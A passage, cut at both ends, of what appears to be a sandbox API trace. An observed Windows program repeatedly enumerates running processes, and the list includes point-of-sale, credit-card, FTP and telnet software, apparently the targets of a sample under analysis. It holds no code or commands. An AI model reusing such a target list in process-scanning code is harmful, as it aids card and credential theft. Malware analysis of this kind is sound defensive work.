th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0224.044] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0224.046] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0224.048] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0224.051] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0224.054] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0224.056] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0224.106] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0224.108] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0224.110] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0224.112] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0224.114] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0224.116] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0224.119] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0224.122] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0224.125] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0224.127] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0224.300] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0224.302] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0224.305] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0224.307] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0224.311] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0224.313] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0224.315] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0224.317] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.319] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.320] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.322] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0224.326] CloseHandle (hObject=0x2278) returned 1 [0224.326] Sleep (dwMilliseconds=0x64) [0224.464] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0224.475] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.476] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.478] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.482] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.483] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.485] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.486] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.487] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.489] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.491] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.493] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.497] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.499] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.501] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.503] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.505] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.507] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.509] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.559] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.562] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.564] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0224.566] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0224.567] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.569] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.571] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0224.573] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0224.575] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0224.577] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0224.579] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.581] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0224.583] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0224.585] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.587] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0224.589] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0224.591] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0224.593] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0224.595] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0224.597] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0224.599] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0224.601] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0224.603] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0224.631] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0224.633] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0224.634] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0224.636] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0224.637] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0224.639] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0224.640] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0224.641] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0224.643] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0224.645] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0224.646] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0224.648] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0224.649] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0224.650] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0224.652] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0224.653] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, 